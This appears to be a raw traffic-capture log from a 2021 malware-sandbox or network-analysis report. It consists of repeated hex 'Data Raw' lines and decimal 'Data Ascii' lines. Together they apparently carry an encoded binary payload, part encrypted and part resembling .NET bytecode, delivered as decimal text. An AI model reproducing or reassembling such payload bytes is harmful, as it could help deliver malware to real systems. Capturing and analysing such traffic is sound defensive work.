                                                                                              2021-09-27 18:27:45 UTC2155INData Raw: 36 35 20 31 33 20 35 37 20 31 37 31 20 31 35 30 20 31 39 20 35 36 20 31 32 32 20 31 38 30 20 39 36 20 31 33 36 20 38 32 20 32 32 35 20 31 38 38 20 32 35 20 31 35 20 31 31 36 20 36 37 20 31 35 39 20 32 32 30 20 38 38 20 31 30 38 20 32 32 35 20 31 36 36 20 32 31 36 20 38 37 20 37 32 20 38 20 31 34 32 20 32 31 37 20 31 35 32 20 31 36 39 20 32 30 30 20 31 37 36 20 31 32 33 20 31 31 31 20 31 32 36 20 31 39 35 20 31 38 20 31 33 34 20 32 33 37 20 38 35 20 31 30 36 20 31 30 39 20 34 20 32 30 33 20 31 31 38 20 31 31 36 20 36 32 20 31 35 38 20 31 30 36 20 31 38 39 20 31 37 30 20 36 20 32 34 20 31 30 30 20 39 20 31 36 33 20 31 30 34 20 32 32 36 20 36 20 35 30 20 31 35 30 20 32 30 33 20 32 32 32 20 32 31 39 20 31 37 36 20 38 34 20 35 34 20 31 39 38 20 35 37 20 31 31
                                                                                              Data Ascii: 65 13 57 171 150 19 56 122 180 96 136 82 225 188 25 15 116 67 159 220 88 108 225 166 216 87 72 8 142 217 152 169 200 176 123 111 126 195 18 134 237 85 106 109 4 203 118 116 62 158 106 189 170 6 24 100 9 163 104 226 6 50 150 203 222 219 176 84 54 198 57 11
                                                                                              2021-09-27 18:27:45 UTC2171INData Raw: 31 34 39 20 31 31 30 20 33 36 20 37 38 20 31 31 36 20 36 34 20 31 31 33 20 31 38 20 31 34 30 20 35 20 37 39 20 31 39 37 20 31 31 39 20 37 20 32 32 37 20 31 39 31 20 32 31 20 38 38 20 31 35 35 20 31 32 20 31 34 33 20 31 37 31 20 31 30 36 20 31 36 33 20 35 36 20 32 32 35 20 32 30 31 20 36 30 20 32 35 32 20 31 36 39 20 33 37 20 37 38 20 32 30 35 20 32 35 34 20 31 32 39 20 39 30 20 31 32 30 20 32 20 31 37 33 20 34 39 20 36 34 20 31 34 34 20 32 30 30 20 31 30 37 20 39 32 20 31 32 33 20 31 33 34 20 31 38 39 20 32 31 36 20 39 37 20 31 31 38 20 34 36 20 31 31 31 20 32 33 35 20 32 31 30 20 31 30 36 20 32 35 35 20 34 30 20 31 35 20 32 31 33 20 31 38 39 20 31 30 30 20 31 34 34 20 35 39 20 32 33 36 20 32 35 35 20 31 36 30 20 38 39 20 31 33 31 20 39 20 31 33 34 20 31
                                                                                              Data Ascii: 149 110 36 78 116 64 113 18 140 5 79 197 119 7 227 191 21 88 155 12 143 171 106 163 56 225 201 60 252 169 37 78 205 254 129 90 120 2 173 49 64 144 200 107 92 123 134 189 216 97 118 46 111 235 210 106 255 40 15 213 189 100 144 59 236 255 160 89 131 9 134 1
                                                                                              2021-09-27 18:27:45 UTC2187INData Raw: 32 34 36 20 32 32 20 32 30 36 20 31 36 36 20 36 38 20 36 32 20 39 31 20 32 35 30 20 34 39 20 32 34 39 20 31 34 38 20 32 32 36 20 34 36 20 36 35 20 31 36 34 20 32 35 30 20 32 37 20 39 35 20 32 32 36 20 32 32 32 20 31 39 37 20 38 32 20 31 34 39 20 32 30 36 20 31 33 35 20 35 39 20 31 33 20 31 37 32 20 31 32 38 20 31 32 35 20 34 20 34 31 20 31 39 31 20 31 38 39 20 32 35 32 20 32 30 38 20 31 36 33 20 31 39 31 20 31 31 20 31 34 36 20 32 30 20 32 34 32 20 31 34 30 20 32 34 39 20 32 34 30 20 34 33 20 39 33 20 32 33 34 20 39 33 20 31 30 20 32 31 30 20 31 37 37 20 31 31 35 20 36 34 20 31 30 20 31 34 31 20 31 32 34 20 31 33 38 20 32 38 20 38 39 20 31 34 39 20 31 37 34 20 36 33 20 32 32 33 20 31 39 39 20 39 30 20 31 36 31 20 33 38 20 31 38 38 20 31 33 38 20 32 33 30
                                                                                              Data Ascii: 246 22 206 166 68 62 91 250 49 249 148 226 46 65 164 250 27 95 226 222 197 82 149 206 135 59 13 172 128 125 4 41 191 189 252 208 163 191 11 146 20 242 140 249 240 43 93 234 93 10 210 177 115 64 10 141 124 138 28 89 149 174 63 223 199 90 161 38 188 138 230
                                                                                              2021-09-27 18:27:45 UTC2203INData Raw: 32 33 30 20 31 38 32 20 33 32 20 32 35 20 33 35 20 32 30 35 20 31 34 20 31 32 20 32 39 20 31 35 38 20 31 35 39 20 31 33 37 20 32 35 20 31 37 36 20 31 36 33 20 34 38 20 31 37 39 20 31 36 34 20 32 30 33 20 33 20 36 20 37 37 20 31 37 39 20 31 34 35 20 31 31 34 20 32 30 31 20 31 30 37 20 38 39 20 39 36 20 35 39 20 31 33 36 20 32 31 31 20 31 38 32 20 32 35 30 20 31 38 31 20 33 34 20 35 38 20 31 39 38 20 31 31 33 20 37 31 20 32 32 37 20 37 33 20 32 34 31 20 32 34 33 20 33 31 20 31 35 37 20 32 30 34 20 36 36 20 32 33 31 20 34 37 20 31 37 37 20 39 32 20 31 39 30 20 31 30 31 20 31 31 31 20 32 34 31 20 32 32 35 20 31 39 39 20 32 32 34 20 35 36 20 31 32 32 20 32 33 32 20 36 35 20 32 33 35 20 31 30 20 31 35 39 20 38 36 20 31 32 33 20 31 31 35 20 31 32 31 20 32 35 20
                                                                                              Data Ascii: 230 182 32 25 35 205 14 12 29 158 159 137 25 176 163 48 179 164 203 3 6 77 179 145 114 201 107 89 96 59 136 211 182 250 181 34 58 198 113 71 227 73 241 243 31 157 204 66 231 47 177 92 190 101 111 241 225 199 224 56 122 232 65 235 10 159 86 123 115 121 25
                                                                                              2021-09-27 18:27:45 UTC2219INData Raw: 31 37 36 20 32 35 32 20 31 35 38 20 35 36 20 31 34 37 20 32 30 33 20 30 20 32 33 37 20 31 32 20 31 38 35 20 31 20 35 38 20 35 20 32 30 30 20 31 36 30 20 37 33 20 31 36 31 20 31 31 36 20 32 32 35 20 37 30 20 36 37 20 31 38 38 20 31 20 38 33 20 39 35 20 34 37 20 31 32 38 20 32 35 33 20 32 35 33 20 31 32 39 20 31 35 32 20 32 30 32 20 32 33 32 20 31 33 33 20 31 36 34 20 31 31 38 20 31 33 31 20 32 32 38 20 31 38 35 20 36 31 20 36 30 20 31 30 32 20 31 36 30 20 31 36 36 20 32 32 32 20 39 31 20 31 32 20 35 36 20 31 31 35 20 33 20 31 36 35 20 31 30 30 20 35 20 31 30 35 20 38 20 35 33 20 31 32 31 20 31 30 30 20 31 33 31 20 31 31 32 20 38 33 20 31 30 30 20 31 30 33 20 32 34 20 39 34 20 36 34 20 33 39 20 39 35 20 36 39 20 31 36 31 20 31 34 37 20 37 32 20 31 39 37 20
                                                                                              Data Ascii: 176 252 158 56 147 203 0 237 12 185 1 58 5 200 160 73 161 116 225 70 67 188 1 83 95 47 128 253 253 129 152 202 232 133 164 118 131 228 185 61 60 102 160 166 222 91 12 56 115 3 165 100 5 105 8 53 121 100 131 112 83 100 103 24 94 64 39 95 69 161 147 72 197
                                                                                              2021-09-27 18:27:45 UTC2235INData Raw: 20 31 36 33 20 38 38 20 33 36 20 31 36 30 20 31 35 36 20 31 35 39 20 31 32 31 20 39 32 20 30 20 31 37 39 20 32 31 36 20 36 39 20 31 32 36 20 37 36 20 31 36 35 20 31 37 32 20 33 36 20 34 39 20 31 37 39 20 39 20 31 33 34 20 32 39 20 31 30 32 20 31 39 35 20 31 39 38 20 31 34 33 20 31 31 37 20 31 32 31 20 34 34 20 33 30 20 35 37 20 32 32 37 20 33 36 20 32 33 35 20 31 39 37 20 31 34 38 20 36 32 20 31 32 39 20 31 30 31 20 31 35 32 20 38 20 32 33 39 20 39 20 32 33 32 20 36 32 20 32 33 36 20 35 32 20 31 30 20 31 34 20 31 35 36 20 34 33 20 31 30 39 20 31 32 36 20 31 32 35 20 31 37 37 20 31 35 20 31 39 35 20 31 30 20 31 34 30 20 31 37 36 20 37 32 20 31 30 31 20 33 31 20 32 33 31 20 38 32 20 32 34 20 31 33 38 20 31 39 39 20 32 30 36 20 31 36 35 20 32 30 33 20 31 30
                                                                                              Data Ascii: 163 88 36 160 156 159 121 92 0 179 216 69 126 76 165 172 36 49 179 9 134 29 102 195 198 143 117 121 44 30 57 227 36 235 197 148 62 129 101 152 8 239 9 232 62 236 52 10 14 156 43 109 126 125 177 15 195 10 140 176 72 101 31 231 82 24 138 199 206 165 203 10
                                                                                              2021-09-27 18:27:45 UTC2251INData Raw: 31 33 20 31 37 39 20 36 32 20 32 34 34 20 31 38 39 20 31 30 39 20 37 35 20 38 38 20 32 32 30 20 33 34 20 32 34 39 20 31 37 34 20 32 33 35 20 31 38 33 20 34 32 20 32 34 34 20 31 34 30 20 32 32 33 20 32 33 30 20 34 30 20 34 34 20 32 30 38 20 31 30 30 20 36 20 31 30 35 20 31 39 38 20 38 30 20 31 30 36 20 32 32 39 20 32 33 31 20 31 38 39 20 31 39 33 20 32 32 32 20 34 35 20 31 30 35 20 32 34 30 20 31 39 32 20 31 39 38 20 31 37 38 20 32 32 35 20 34 31 20 36 33 20 31 35 32 20 32 35 35 20 37 33 20 34 33 20 31 37 33 20 31 39 34 20 32 34 20 31 39 31 20 31 36 39 20 38 35 20 38 38 20 32 35 30 20 31 30 36 20 35 32 20 34 20 32 33 31 20 34 32 20 32 30 20 39 38 20 31 32 39 20 31 37 34 20 32 30 32 20 34 20 33 30 20 35 20 32 34 20 31 35 38 20 31 20 31 37 33 20 31 30 20 32
                                                                                              Data Ascii: 13 179 62 244 189 109 75 88 220 34 249 174 235 183 42 244 140 223 230 40 44 208 100 6 105 198 80 106 229 231 189 193 222 45 105 240 192 198 178 225 41 63 152 255 73 43 173 194 24 191 169 85 88 250 106 52 4 231 42 20 98 129 174 202 4 30 5 24 158 1 173 10 2
                                                                                              2021-09-27 18:27:45 UTC2267INData Raw: 30 20 31 32 35 20 37 31 20 32 32 37 20 31 32 38 20 31 38 30 20 33 33 20 39 34 20 31 38 34 20 37 32 20 31 36 32 20 31 38 20 37 31 20 32 33 30 20 31 33 30 20 32 33 30 20 32 30 34 20 31 32 20 32 31 37 20 32 33 34 20 31 34 35 20 37 34 20 32 30 31 20 31 38 31 20 32 35 30 20 32 33 38 20 33 32 20 34 30 20 31 39 20 39 35 20 31 30 32 20 31 35 20 32 32 33 20 36 34 20 32 31 36 20 32 30 35 20 31 37 37 20 32 35 35 20 34 36 20 31 31 34 20 31 31 38 20 32 31 30 20 31 36 33 20 32 34 20 32 33 30 20 32 34 31 20 31 32 31 20 39 36 20 32 31 37 20 31 32 20 32 20 31 31 35 20 32 31 20 31 38 37 20 35 37 20 31 30 34 20 31 37 36 20 38 20 34 35 20 31 39 37 20 32 32 30 20 31 39 20 32 32 36 20 39 35 20 31 35 30 20 38 32 20 31 34 35 20 31 34 20 31 33 37 20 32 38 20 31 33 20 31 33 34 20
                                                                                              Data Ascii: 0 125 71 227 128 180 33 94 184 72 162 18 71 230 130 230 204 12 217 234 145 74 201 181 250 238 32 40 19 95 102 15 223 64 216 205 177 255 46 114 118 210 163 24 230 241 121 96 217 12 2 115 21 187 57 104 176 8 45 197 220 19 226 95 150 82 145 14 137 28 13 134
                                                                                              2021-09-27 18:27:45 UTC2283INData Raw: 20 31 31 36 20 31 34 34 20 38 32 20 32 34 33 20 37 32 20 31 36 39 20 31 32 33 20 31 39 35 20 34 20 31 34 36 20 39 31 20 32 31 37 20 31 31 39 20 38 37 20 35 38 20 37 31 20 31 34 39 20 32 31 31 20 31 38 36 20 31 35 31 20 32 33 30 20 33 39 20 32 33 37 20 39 33 20 37 31 20 37 30 20 31 32 35 20 31 36 31 20 32 30 32 20 32 34 32 20 31 37 30 20 32 35 33 20 31 34 36 20 31 39 36 20 31 31 20 31 39 34 20 31 36 35 20 31 30 38 20 36 35 20 31 38 33 20 33 20 32 30 30 20 31 37 33 20 34 38 20 35 37 20 32 36 20 36 20 35 35 20 34 33 20 34 38 20 32 33 20 32 31 33 20 36 38 20 31 36 37 20 32 34 33 20 32 31 34 20 31 31 38 20 38 34 20 31 36 32 20 32 31 31 20 32 35 31 20 31 39 32 20 38 30 20 36 35 20 31 36 38 20 31 35 20 37 39 20 31 39 39 20 36 36 20 32 31 34 20 32 35 20 34 39 20
                                                                                              Data Ascii: 116 144 82 243 72 169 123 195 4 146 91 217 119 87 58 71 149 211 186 151 230 39 237 93 71 70 125 161 202 242 170 253 146 196 11 194 165 108 65 183 3 200 173 48 57 26 6 55 43 48 23 213 68 167 243 214 118 84 162 211 251 192 80 65 168 15 79 199 66 214 25 49
                                                                                              2021-09-27 18:27:45 UTC2299INData Raw: 20 31 38 37 20 31 34 39 20 31 34 33 20 31 31 37 20 31 20 31 30 36 20 31 37 20 31 34 30 20 31 31 37 20 32 34 32 20 31 33 39 20 31 33 37 20 32 34 38 20 32 32 32 20 32 32 37 20 32 31 34 20 36 38 20 32 30 34 20 31 34 37 20 32 30 38 20 31 36 30 20 31 36 35 20 31 34 30 20 36 37 20 31 38 30 20 37 30 20 32 33 37 20 36 32 20 30 20 35 20 37 37 20 36 33 20 32 33 32 20 32 31 32 20 32 32 38 20 31 35 35 20 31 31 33 20 31 33 20 31 38 39 20 32 30 38 20 32 31 35 20 32 32 39 20 31 34 39 20 32 32 38 20 36 36 20 39 37 20 31 36 36 20 31 35 39 20 31 32 36 20 31 36 30 20 32 30 34 20 31 39 31 20 31 38 39 20 31 30 39 20 37 32 20 37 31 20 31 33 38 20 32 30 33 20 31 38 33 20 31 30 39 20 38 33 20 31 30 33 20 34 39 20 32 33 30 20 31 34 33 20 31 30 37 20 35 38 20 31 35 33 20 35 30 20
                                                                                              Data Ascii: 187 149 143 117 1 106 17 140 117 242 139 137 248 222 227 214 68 204 147 208 160 165 140 67 180 70 237 62 0 5 77 63 232 212 228 155 113 13 189 208 215 229 149 228 66 97 166 159 126 160 204 191 189 109 72 71 138 203 183 109 83 103 49 230 143 107 58 153 50
                                                                                              2021-09-27 18:27:45 UTC2315INData Raw: 20 31 36 36 20 35 39 20 32 31 20 31 34 39 20 37 38 20 33 31 20 39 34 20 35 34 20 34 20 31 32 35 20 33 32 20 32 33 36 20 39 37 20 32 34 36 20 37 31 20 31 32 37 20 31 36 39 20 38 31 20 31 39 39 20 31 37 35 20 36 30 20 31 35 36 20 32 30 36 20 31 32 35 20 32 34 34 20 31 38 37 20 31 31 34 20 39 31 20 32 33 39 20 31 30 38 20 33 30 20 32 34 36 20 33 39 20 38 34 20 32 33 39 20 31 37 35 20 31 38 31 20 31 36 31 20 32 33 37 20 32 34 33 20 39 34 20 31 39 20 35 20 37 30 20 31 34 33 20 32 35 34 20 31 34 34 20 31 34 39 20 32 33 35 20 38 20 31 36 38 20 32 32 33 20 37 31 20 31 33 30 20 34 33 20 32 34 34 20 39 37 20 31 38 32 20 34 36 20 38 20 31 39 20 32 32 33 20 38 31 20 32 31 38 20 39 37 20 38 35 20 35 38 20 31 31 36 20 32 35 32 20 32 34 38 20 31 38 32 20 31 37 37 20 31
                                                                                              Data Ascii: 166 59 21 149 78 31 94 54 4 125 32 236 97 246 71 127 169 81 199 175 60 156 206 125 244 187 114 91 239 108 30 246 39 84 239 175 181 161 237 243 94 19 5 70 143 254 144 149 235 8 168 223 71 130 43 244 97 182 46 8 19 223 81 218 97 85 58 116 252 248 182 177 1
                                                                                              2021-09-27 18:27:45 UTC2331INData Raw: 33 20 39 20 32 39 20 34 39 20 31 33 30 20 32 32 33 20 36 36 20 33 37 20 35 32 20 35 35 20 31 36 30 20 36 30 20 35 33 20 31 30 39 20 32 30 31 20 34 35 20 34 35 20 37 38 20 31 37 30 20 31 38 37 20 38 37 20 37 39 20 31 34 39 20 32 31 31 20 38 20 34 30 20 31 38 34 20 31 39 34 20 33 34 20 31 35 31 20 31 32 30 20 31 31 39 20 37 38 20 30 20 31 35 31 20 32 34 20 39 33 20 31 37 35 20 31 33 34 20 31 30 39 20 31 33 32 20 37 34 20 32 31 36 20 31 36 36 20 32 35 35 20 31 34 34 20 31 34 39 20 31 37 34 20 32 34 35 20 36 30 20 32 34 30 20 31 32 36 20 32 32 36 20 31 34 34 20 31 38 31 20 37 39 20 38 34 20 37 34 20 32 37 20 31 36 38 20 32 32 37 20 31 30 35 20 31 37 32 20 31 34 20 37 38 20 34 30 20 32 33 39 20 31 38 35 20 31 36 38 20 31 36 33 20 36 34 20 32 32 34 20 36 34 20
                                                                                              Data Ascii: 3 9 29 49 130 223 66 37 52 55 160 60 53 109 201 45 45 78 170 187 87 79 149 211 8 40 184 194 34 151 120 119 78 0 151 24 93 175 134 109 132 74 216 166 255 144 149 174 245 60 240 126 226 144 181 79 84 74 27 168 227 105 172 14 78 40 239 185 168 163 64 224 64
                                                                                              2021-09-27 18:27:45 UTC2347INData Raw: 20 38 33 20 31 35 33 20 31 37 35 20 39 37 20 32 35 34 20 31 31 33 20 32 30 35 20 31 32 37 20 38 20 32 32 30 20 31 39 36 20 31 33 36 20 31 30 30 20 31 30 33 20 32 30 30 20 32 31 39 20 34 39 20 31 31 38 20 31 39 20 31 38 36 20 32 31 35 20 31 35 38 20 32 35 35 20 32 38 20 31 32 35 20 35 34 20 32 34 31 20 31 37 20 31 37 32 20 32 34 37 20 32 32 31 20 31 34 33 20 31 33 39 20 32 31 37 20 33 34 20 31 33 30 20 39 37 20 31 38 35 20 32 33 36 20 31 33 30 20 31 32 36 20 31 38 39 20 32 32 37 20 32 34 37 20 32 20 33 38 20 31 30 20 38 32 20 35 39 20 38 33 20 31 34 34 20 32 34 37 20 32 34 32 20 31 31 32 20 32 33 38 20 34 30 20 31 37 31 20 31 34 38 20 32 34 35 20 31 35 31 20 32 33 35 20 31 34 31 20 37 20 37 35 20 32 30 39 20 31 37 34 20 32 33 39 20 32 31 20 32 33 30 20 38
                                                                                              Data Ascii: 83 153 175 97 254 113 205 127 8 220 196 136 100 103 200 219 49 118 19 186 215 158 255 28 125 54 241 17 172 247 221 143 139 217 34 130 97 185 236 130 126 189 227 247 2 38 10 82 59 83 144 247 242 112 238 40 171 148 245 151 235 141 7 75 209 174 239 21 230 8
                                                                                              2021-09-27 18:27:45 UTC2363INData Raw: 35 32 20 35 38 20 38 34 20 31 32 35 20 31 33 38 20 38 20 31 31 35 20 32 33 34 20 32 20 31 31 20 31 36 31 20 32 34 35 20 31 33 30 20 31 36 31 20 31 33 34 20 31 37 39 20 31 39 30 20 32 20 32 30 31 20 32 31 35 20 31 35 34 20 31 30 36 20 32 32 36 20 32 30 34 20 31 38 36 20 31 36 33 20 36 32 20 31 32 20 36 30 20 31 30 39 20 35 30 20 32 30 39 20 38 32 20 32 33 33 20 32 35 31 20 32 34 36 20 32 32 32 20 31 39 35 20 32 32 38 20 36 32 20 32 35 31 20 31 31 38 20 32 35 35 20 32 30 33 20 33 39 20 31 34 37 20 31 37 30 20 31 33 30 20 32 30 38 20 32 20 31 33 33 20 31 31 35 20 31 32 34 20 32 34 32 20 31 30 33 20 31 35 37 20 31 32 31 20 33 33 20 39 30 20 31 32 38 20 31 38 31 20 31 34 36 20 34 33 20 32 31 37 20 31 36 30 20 31 36 36 20 39 36 20 31 30 37 20 31 30 38 20 39 38
                                                                                              Data Ascii: 52 58 84 125 138 8 115 234 2 11 161 245 130 161 134 179 190 2 201 215 154 106 226 204 186 163 62 12 60 109 50 209 82 233 251 246 222 195 228 62 251 118 255 203 39 147 170 130 208 2 133 115 124 242 103 157 121 33 90 128 181 146 43 217 160 166 96 107 108 98
                                                                                              2021-09-27 18:27:45 UTC2379INData Raw: 20 32 38 20 31 36 31 20 31 20 39 33 20 32 33 33 20 31 34 35 20 31 38 38 20 32 31 36 20 38 37 20 32 33 39 20 33 30 20 31 35 39 20 32 35 35 20 32 33 32 20 38 37 20 35 20 32 31 33 20 30 20 38 34 20 37 30 20 31 38 20 31 38 20 31 36 33 20 37 30 20 31 38 20 33 31 20 36 34 20 31 31 32 20 32 32 30 20 31 35 30 20 31 38 20 31 38 37 20 31 35 32 20 37 35 20 38 31 20 31 34 34 20 31 34 33 20 34 34 20 39 33 20 31 39 20 33 38 20 32 32 38 20 32 20 32 33 36 20 31 39 39 20 37 20 31 39 35 20 31 34 39 20 31 32 37 20 35 20 31 37 38 20 31 32 39 20 31 39 33 20 39 34 20 31 31 31 20 35 30 20 36 20 31 33 35 20 33 33 20 32 33 35 20 31 38 34 20 31 37 20 34 39 20 31 31 20 31 34 36 20 31 31 31 20 32 32 37 20 32 31 38 20 32 35 30 20 31 32 38 20 31 36 39 20 31 38 33 20 31 37 33 20 31 33
                                                                                              Data Ascii: 28 161 1 93 233 145 188 216 87 239 30 159 255 232 87 5 213 0 84 70 18 18 163 70 18 31 64 112 220 150 18 187 152 75 81 144 143 44 93 19 38 228 2 236 199 7 195 149 127 5 178 129 193 94 111 50 6 135 33 235 184 17 49 11 146 111 227 218 250 128 169 183 173 13
                                                                                              2021-09-27 18:27:45 UTC2395INData Raw: 32 20 33 20 30 20 30 20 30 20 32 35 34 20 31 34 20 32 20 30 20 31 31 34 20 37 39 20 32 35 31 20 33 20 31 31 32 20 31 31 34 20 36 39 20 32 35 31 20 33 20 31 31 32 20 34 30 20 35 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 34 20 30 20 33 32 20 34 20 30 20 30 20 30 20 32 35 34 20 31 34 20 32 20 30 20 31 31 34 20 37 39 20 32 35 31 20 33 20 31 31 32 20 31 31 34 20 36 39 20 32 35 31 20 33 20 31 31 32 20 34 30 20 35 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 35 20 30 20 33 32 20 35 20 30 20 30 20 30 20 32 35 34 20 31 34 20 32 20 30 20 31 31 34 20 37 39 20 32 35 31 20 33 20 31 31 32 20 31 31 34 20 36 39 20 32 35 31 20 33 20 31 31 32 20 34 30 20 35 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 36 20 30 20 33 32 20 36 20 30 20 30 20 30 20 32 35 34 20 31
                                                                                              Data Ascii: 2 3 0 0 0 254 14 2 0 114 79 251 3 112 114 69 251 3 112 40 58 0 0 10 254 14 4 0 32 4 0 0 0 254 14 2 0 114 79 251 3 112 114 69 251 3 112 40 58 0 0 10 254 14 5 0 32 5 0 0 0 254 14 2 0 114 79 251 3 112 114 69 251 3 112 40 58 0 0 10 254 14 6 0 32 6 0 0 0 254 1
                                                                                              2021-09-27 18:27:45 UTC2411INData Raw: 31 31 34 20 32 32 39 20 32 20 34 20 31 31 32 20 34 30 20 32 35 20 30 20 30 20 36 20 31 31 31 20 37 38 20 30 20 30 20 31 30 20 31 31 34 20 32 35 20 39 20 34 20 31 31 32 20 31 31 31 20 34 31 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 32 32 20 30 20 32 35 34 20 31 32 20 32 32 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 35 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 30 20 30 20 35 36 20 33 36 20 33 20 30 20 30 20 30 20 30 20 33 32 20 35 33 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 31 34 20 35 20 33 20 34 20 31 31 32 20 31 31 34 20 36 31 20 33 20 34 20 31 31 32 20 34 30 20 32 35 20 30 20 30 20 36 20 31 31 31 20 37 38 20 30 20 30 20 31 30 20 31 31 34 20 32 35 20 39 20
                                                                                              Data Ascii: 114 229 2 4 112 40 25 0 0 6 111 78 0 0 10 114 25 9 4 112 111 41 0 0 10 254 14 22 0 254 12 22 0 57 24 0 0 0 32 51 0 0 0 254 14 3 0 32 1 0 0 0 254 14 0 0 56 36 3 0 0 0 0 32 53 0 0 0 254 14 3 0 114 5 3 4 112 114 61 3 4 112 40 25 0 0 6 111 78 0 0 10 114 25 9
                                                                                              2021-09-27 18:27:45 UTC2427INData Raw: 36 20 31 31 32 20 31 20 30 20 34 20 32 20 31 32 36 20 34 36 20 30 20 30 20 31 30 20 31 32 36 20 31 31 35 20 30 20 30 20 31 30 20 31 32 36 20 31 31 35 20 30 20 30 20 31 30 20 32 32 20 33 32 20 34 20 30 20 30 20 38 20 31 32 36 20 31 31 35 20 30 20 30 20 31 30 20 32 30 20 31 38 20 31 20 31 38 20 32 20 31 31 31 20 31 34 35 20 30 20 30 20 36 20 32 32 20 32 35 34 20 31 20 31 39 20 31 37 20 31 37 20 31 37 20 34 34 20 31 31 20 34 30 20 37 33 20 30 20 30 20 36 20 31 31 35 20 31 34 32 20 30 20 30 20 31 30 20 31 32 32 20 30 20 33 20 33 31 20 36 30 20 34 30 20 31 34 33 20 30 20 30 20 31 30 20 31 39 20 34 20 33 20 31 37 20 34 20 33 31 20 35 32 20 32 31 34 20 34 30 20 31 34 33 20 30 20 30 20 31 30 20 31 39 20 35 20 33 32 20 31 37 39 20 30 20 30 20 30 20 31 34 31 20 36
                                                                                              Data Ascii: 6 112 1 0 4 2 126 46 0 0 10 126 115 0 0 10 126 115 0 0 10 22 32 4 0 0 8 126 115 0 0 10 20 18 1 18 2 111 145 0 0 6 22 254 1 19 17 17 17 44 11 40 73 0 0 6 115 142 0 0 10 122 0 3 31 60 40 143 0 0 10 19 4 3 17 4 31 52 214 40 143 0 0 10 19 5 32 179 0 0 0 141 6
                                                                                              2021-09-27 18:27:45 UTC2443INData Raw: 20 31 38 20 30 20 30 20 30 20 33 31 20 35 33 20 31 35 37 20 33 37 20 33 32 20 31 38 20 30 20 30 20 30 20 33 31 20 35 30 20 31 35 37 20 33 37 20 33 31 20 31 38 20 33 31 20 31 31 31 20 31 35 37 20 33 37 20 33 32 20 31 37 20 30 20 30 20 30 20 33 31 20 34 38 20 31 35 37 20 33 37 20 33 32 20 31 37 20 30 20 30 20 30 20 33 31 20 35 34 20 31 35 37 20 33 37 20 33 32 20 31 37 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 31 20 31 37 20 33 31 20 31 30 35 20 31 35 37 20 33 37 20 33 32 20 31 36 20 30 20 30 20 30 20 33 31 20 35 37 20 31 35 37 20 33 37 20 33 32 20 31 36 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 31 36 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 31 20 31 36 20 33 31 20 31 31 36 20 31 35 37
                                                                                              Data Ascii: 18 0 0 0 31 53 157 37 32 18 0 0 0 31 50 157 37 31 18 31 111 157 37 32 17 0 0 0 31 48 157 37 32 17 0 0 0 31 54 157 37 32 17 0 0 0 31 98 157 37 31 17 31 105 157 37 32 16 0 0 0 31 57 157 37 32 16 0 0 0 31 101 157 37 32 16 0 0 0 31 98 157 37 31 16 31 116 157
                                                                                              2021-09-27 18:27:45 UTC2459INData Raw: 31 20 30 20 31 31 31 20 32 30 30 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 30 20 30 20 32 35 34 20 31 33 20 30 20 30 20 34 30 20 31 39 38 20 30 20 30 20 31 30 20 35 37 20 34 32 20 30 20 30 20 30 20 32 35 34 20 39 20 30 20 30 20 31 31 34 20 31 34 20 31 38 20 34 20 31 31 32 20 32 35 34 20 39 20 31 20 30 20 31 31 31 20 32 30 30 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 20 30 20 32 35 34 20 31 33 20 31 20 30 20 32 35 34 20 32 32 20 31 34 20 30 20 30 20 32 37 20 31 31 31 20 31 39 20 30 20 30 20 31 30 20 34 30 20 31 30 33 20 30 20 30 20 36 20 34 32 20 30 20 30 20 31 39 20 34 38 20 33 20 30 20 31 33 39 20 30 20 30 20 30 20 34 39 20 30 20 30 20 31 37 20 32 35 34 20 39 20 31 20 30 20 31 31 31 20 32 30 31 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 30 20
                                                                                              Data Ascii: 1 0 111 200 0 0 10 254 14 0 0 254 13 0 0 40 198 0 0 10 57 42 0 0 0 254 9 0 0 114 14 18 4 112 254 9 1 0 111 200 0 0 10 254 14 1 0 254 13 1 0 254 22 14 0 0 27 111 19 0 0 10 40 103 0 0 6 42 0 0 19 48 3 0 139 0 0 0 49 0 0 17 254 9 1 0 111 201 0 0 10 254 14 0
                                                                                              2021-09-27 18:27:45 UTC2475INData Raw: 20 32 32 20 30 20 31 30 36 20 31 35 39 20 32 33 39 20 38 20 32 32 20 30 20 31 33 20 31 36 32 20 32 33 39 20 38 20 32 32 20 30 20 32 34 38 20 31 30 31 20 32 34 33 20 38 20 36 20 30 20 31 34 30 20 31 31 34 20 31 31 34 20 32 20 31 20 30 20 32 33 37 20 38 39 20 32 30 37 20 39 20 31 20 30 20 32 30 39 20 31 34 35 20 32 30 37 20 39 20 31 20 30 20 32 32 33 20 33 34 20 32 30 37 20 39 20 31 20 31 36 20 32 34 34 20 31 36 37 20 32 31 30 20 39 20 31 20 30 20 31 39 20 35 39 20 32 31 37 20 39 20 31 20 30 20 32 34 32 20 35 31 20 32 31 37 20 39 20 31 20 30 20 31 39 32 20 31 32 35 20 32 31 37 20 39 20 31 20 30 20 31 30 34 20 31 30 33 20 32 31 37 20 39 20 36 20 30 20 31 35 30 20 31 35 32 20 32 31 37 20 39 20 36 20 30 20 32 35 20 31 34 35 20 32 31 37 20 39 20 36 20 30 20 31
                                                                                              Data Ascii: 22 0 106 159 239 8 22 0 13 162 239 8 22 0 248 101 243 8 6 0 140 114 114 2 1 0 237 89 207 9 1 0 209 145 207 9 1 0 223 34 207 9 1 16 244 167 210 9 1 0 19 59 217 9 1 0 242 51 217 9 1 0 192 125 217 9 1 0 104 103 217 9 6 0 150 152 217 9 6 0 25 145 217 9 6 0 1
